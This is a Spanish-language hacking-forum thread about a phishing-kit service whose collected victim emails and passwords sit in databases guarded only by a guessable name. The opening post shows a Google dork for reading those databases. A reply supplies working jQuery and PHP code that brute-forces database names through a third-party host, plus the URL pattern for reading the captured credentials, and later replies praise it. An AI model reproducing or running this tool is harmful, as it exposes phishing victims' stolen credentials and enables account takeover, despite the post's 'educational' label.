Comienzo mi dia tranquilo y como soy amante de lo que respecta a ing. social (fakes/scam, engaños, phishing : Ojo con fines educativos claro esta!) enpece buscando con mi buscador preferido sitios en donde se pueda configurar un ataque de phishing, y me tope con xploitv.net creo yo que ya lleva mucho tiempo en el tema, pero bueno vamos a lo que respecta el tema, ps me di cuenta que solo basta con poner un nombre clave a tu base de datos (bd) y ps con ese nombre que supuestamente tu y solo tu debes saber, vizualizaras los correos y claves que hayas pescado.
decidí hacer una búsqueda con el dork site: en google
site:http://xploitv.net/b=
y ps me resulto muy fácil leer todas las bases de datos que quise. si me preguntan si me interesan ps no me interesan por que no se de quien son ni a quien les pertenecen así que no he hecho nada malo.
(http://i62.tinypic.com/28kukxd.png)
y como es mi primer aporte en underc0de, ps decidí postearlo solo aquí.
Pd: si alguien lo postea en otro site por favor respete los créditos.
Saludos.
Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:
(http://i.imgur.com/oRdzhDt.png)
finder_usernames.html
<script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript">
$("document").ready(function(){
$("#submit").click(function(e){
e.preventDefault();
var list_users = $("#usernames").val().split("\n");
$.each(list_users,function(index,username){
//console.log(username+ "\n");
$.get(
'usernames.php',
{usernames : username},
function(data) {
$('.resultados').append(username + ":" + data + '<br />');
},
"text"
);
});
});
});
</script>
<form action="" method="post">
<textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
<input type="submit" id="submit" value="Exploit Usernames" />
</form>
<p class="resultados"></p>
usernames.php
<?php
if(isset($_GET['usernames'])){
echo file_get_contents("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
}
?>
y para leerlos:
http://server5.lincehost.net/~neek/xploitv/script2.php?db=ElUSUARIO&action=read
o usar el servicio: http://xploitv.net/b=ELUSUARIO
donde c es el numero de usuarios
Saludos!
que te puedo decir brth ARTHUSU, no solo complementaste el post. genial.
saludos.
Muy buen aporte muchas gracias me sirvio bastante :)